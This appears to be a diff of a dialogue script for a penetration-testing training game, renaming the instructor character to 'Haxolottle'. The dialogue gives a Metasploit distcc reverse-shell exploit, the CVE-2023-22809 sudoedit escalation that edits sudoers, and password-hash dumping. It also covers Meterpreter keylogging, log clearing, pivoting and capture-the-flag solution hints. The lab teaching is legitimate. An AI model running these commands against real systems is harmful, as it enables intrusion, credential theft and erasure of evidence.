~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Does Meterpreter have anti-forensics features?] - Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + Haxolottle: Yes, Meterpreter is designed with anti-forensics in mind: - Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + Haxolottle: It runs in memory without writing to disk (fileless) - Advanced Tactics Instructor: It can migrate between processes, making it hard to find + Haxolottle: It can migrate between processes, making it hard to find - Advanced Tactics Instructor: Communications are encrypted + Haxolottle: Communications are encrypted - Advanced Tactics Instructor: There are modules to clear event logs: clearev + Haxolottle: There are modules to clear event logs: clearev - Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + Haxolottle: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === commands_reference === -Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. +Haxolottle: Let me provide a comprehensive post-exploitation commands reference. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** +Haxolottle: **Initial Exploitation (Distcc example):** -Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) +Haxolottle: nmap -p 1-65535 TARGET (scan all ports) -Advanced Tactics Instructor: msfconsole +Haxolottle: msfconsole -Advanced Tactics Instructor: search distccd +Haxolottle: search distccd -Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec +Haxolottle: use exploit/unix/misc/distcc_exec -Advanced Tactics Instructor: set RHOST TARGET_IP +Haxolottle: set RHOST TARGET_IP -Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse +Haxolottle: set PAYLOAD cmd/unix/reverse -Advanced Tactics Instructor: set LHOST YOUR_IP +Haxolottle: set LHOST YOUR_IP -Advanced Tactics Instructor: exploit +Haxolottle: exploit + [Show me access assessment commands] - Advanced Tactics Instructor: **Assessing Access Level:** + Haxolottle: **Assessing Access Level:** - Advanced Tactics Instructor: whoami (show username) + Haxolottle: whoami (show username) - Advanced Tactics Instructor: id (show UID, GID, groups) + Haxolottle: id (show UID, GID, groups) - Advanced Tactics Instructor: id -u (show just UID - 0 means root) + Haxolottle: id -u (show just UID - 0 means root) - Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + Haxolottle: cat /etc/shadow (try to read - if fails, not root) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me information gathering commands] - Advanced Tactics Instructor: **Information Gathering (Linux):** + Haxolottle: **Information Gathering (Linux):** - Advanced Tactics Instructor: env (environment variables) + Haxolottle: env (environment variables) - Advanced Tactics Instructor: uname -a (kernel version) + Haxolottle: uname -a (kernel version) - Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + Haxolottle: cat /proc/cpuinfo (CPU info) - Advanced Tactics Instructor: free -h (memory) + Haxolottle: free -h (memory) - Advanced Tactics Instructor: df -h (disk space) + Haxolottle: df -h (disk space) - Advanced Tactics Instructor: cat /etc/passwd (user accounts) + Haxolottle: cat /etc/passwd (user accounts) - Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + Haxolottle: sudo --version (check for vulnerable sudo) - Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + Haxolottle: ifconfig or ip a (network interfaces) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me privilege escalation commands] - Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + Haxolottle: **Privilege Escalation (CVE-2023-22809):** - Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: (View password hashes) + Haxolottle: (View password hashes) - Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + Haxolottle: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts - Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + Haxolottle: (Edit sudoers file - be very careful!) - Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + Haxolottle: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" - Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + Haxolottle: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter - Advanced Tactics Instructor: sudo -i (escalate to root) + Haxolottle: sudo -i (escalate to root) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Linux admin commands] - Advanced Tactics Instructor: **Linux Post-Exploitation:** + Haxolottle: **Linux Post-Exploitation:** - Advanced Tactics Instructor: useradd USERNAME (create user) + Haxolottle: useradd USERNAME (create user) - Advanced Tactics Instructor: passwd USERNAME (set password) + Haxolottle: passwd USERNAME (set password) - Advanced Tactics Instructor: cat /etc/passwd (list users) + Haxolottle: cat /etc/passwd (list users) - Advanced Tactics Instructor: sh (spawn command interpreter) + Haxolottle: sh (spawn command interpreter) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Metasploit post modules] - Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + Haxolottle: **Metasploit Post-Exploitation:** - Advanced Tactics Instructor: Ctrl-Z (background session) + Haxolottle: Ctrl-Z (background session) - Advanced Tactics Instructor: sessions (list sessions) + Haxolottle: sessions (list sessions) - Advanced Tactics Instructor: use post/linux/gather/checkvm + Haxolottle: use post/linux/gather/checkvm - Advanced Tactics Instructor: setg SESSION 1 + Haxolottle: setg SESSION 1 - Advanced Tactics Instructor: exploit + Haxolottle: exploit - Advanced Tactics Instructor: **Useful Post Modules:** + Haxolottle: **Useful Post Modules:** - Advanced Tactics Instructor: post/linux/gather/enum_configs + Haxolottle: post/linux/gather/enum_configs - Advanced Tactics Instructor: post/linux/gather/enum_network + Haxolottle: post/linux/gather/enum_network - Advanced Tactics Instructor: post/linux/gather/enum_system + Haxolottle: post/linux/gather/enum_system - Advanced Tactics Instructor: post/linux/gather/enum_users_history + Haxolottle: post/linux/gather/enum_users_history - Advanced Tactics Instructor: post/linux/gather/hashdump + Haxolottle: post/linux/gather/hashdump - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Meterpreter commands] - Advanced Tactics Instructor: **Meterpreter Commands:** + Haxolottle: **Meterpreter Commands:** - Advanced Tactics Instructor: help (list all commands) + Haxolottle: help (list all commands) - Advanced Tactics Instructor: getuid (current user) + Haxolottle: getuid (current user) - Advanced Tactics Instructor: getprivs (privileges) + Haxolottle: getprivs (privileges) - Advanced Tactics Instructor: ls c:/ (browse files) + Haxolottle: ls c:/ (browse files) - Advanced Tactics Instructor: download FILE (download file) + Haxolottle: download FILE (download file) - Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + Haxolottle: upload LOCAL REMOTE (upload file) - Advanced Tactics Instructor: ps (list processes) + Haxolottle: ps (list processes) - Advanced Tactics Instructor: migrate PID (migrate to process) + Haxolottle: migrate PID (migrate to process) - Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + Haxolottle: shell (drop to system shell, Ctrl-D to return) - Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + Haxolottle: run post/windows/gather/hashdump (dump hashes) - Advanced Tactics Instructor: screenshot (capture screen) + Haxolottle: screenshot (capture screen) - Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + Haxolottle: keyscan_start / keyscan_dump (keylogging) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Armitage commands] - Advanced Tactics Instructor: **Armitage Setup:** + Haxolottle: **Armitage Setup:** - Advanced Tactics Instructor: sudo msfdb reinit + Haxolottle: sudo msfdb reinit - Advanced Tactics Instructor: sudo armitage & + Haxolottle: sudo armitage & - Advanced Tactics Instructor: **Armitage Workflow:** + Haxolottle: **Armitage Workflow:** - Advanced Tactics Instructor: Hosts → Add Host → enter IP + Haxolottle: Hosts → Add Host → enter IP - Advanced Tactics Instructor: Right-click host → Scan + Haxolottle: Right-click host → Scan - Advanced Tactics Instructor: Drag exploit onto target icon → Launch + Haxolottle: Drag exploit onto target icon → Launch - Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + Haxolottle: Right-click compromised host → Meterpreter → Interact - Advanced Tactics Instructor: **Pivoting:** + Haxolottle: **Pivoting:** - Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: Right-click → Meterpreter → Pivoting → Setup → Add Pivot - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 - -> post_exploit_hub === challenge_tips === -Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. +Haxolottle: Let me give you practical tips for the post-exploitation challenges. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: **Exploiting Distcc:** +Haxolottle: **Exploiting Distcc:** -Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET +Haxolottle: Scan all ports to find distcc: nmap -p- TARGET -Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload +Haxolottle: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload -Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. +Haxolottle: You'll get a shell as the distccd user, not root. + [Tips for privilege escalation?] - Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + Haxolottle: Check the sudo version immediately: sudo --version - Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + Haxolottle: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. - Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + Haxolottle: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. - Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + Haxolottle: After editing sudoers, run: sudo -i to become root. - Advanced Tactics Instructor: Verify with: id -u (should show 0) + Haxolottle: Verify with: id -u (should show 0) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using post-exploitation modules?] - Advanced Tactics Instructor: Always background your session first with Ctrl-Z + Haxolottle: Always background your session first with Ctrl-Z - Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + Haxolottle: Use "setg SESSION ID" to set the session globally for all modules. - Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + Haxolottle: Run multiple enum modules to gather comprehensive information. - Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + Haxolottle: The output tells you where loot is stored - check those files! - Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + Haxolottle: Not all modules work perfectly - if one fails, move on to others. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using Meterpreter and Armitage?] - Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. + Haxolottle: Exploit the Windows server with easyftp to get a Meterpreter session. - Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + Haxolottle: Use getuid and getprivs to understand your privileges immediately. - Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + Haxolottle: Browse to user desktops to find flags: ls C:\\Users\\ - Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + Haxolottle: Try both Meterpreter commands and Armitage's GUI features. - Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. + Haxolottle: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for pivoting?] - Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + Haxolottle: Set up a pivot through the Windows system to attack Linux. - Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot - Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + Haxolottle: Add the Linux target: Hosts → Add Hosts → enter Linux IP - Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + Haxolottle: Scan and exploit through the pivot - it will be slower but will work. - Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + Haxolottle: The Armitage interface shows the routing path visually. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where are the flags?] - Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + Haxolottle: Linux flags are in user home directories under /home/ - Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + Haxolottle: Use find /home -name "*flag*" to search for them. - Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + Haxolottle: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ - Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + Haxolottle: One Linux challenge involves cracking a protected.zip file. - Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + Haxolottle: You'll need to dump password hashes and crack them to get the zip password. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === ready_for_practice === -Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. +Haxolottle: Excellent! You're ready for advanced post-exploitation techniques. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ post_exploit_mastery += 10 -Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. +Haxolottle: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. -Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. +Haxolottle: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. -Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. +Haxolottle: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + [Any final advice?] - Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. + Haxolottle: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. - Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + Haxolottle: Take careful notes of what you find - credentials, software versions, vulnerable services. - Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + Haxolottle: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. - Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + Haxolottle: Explore both Meterpreter commands and Armitage's interface to see which you prefer. - Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + Haxolottle: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. - Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + Haxolottle: Most importantly: understand WHY each technique works, not just HOW to execute it. - Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + Haxolottle: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 - -> post_exploit_hub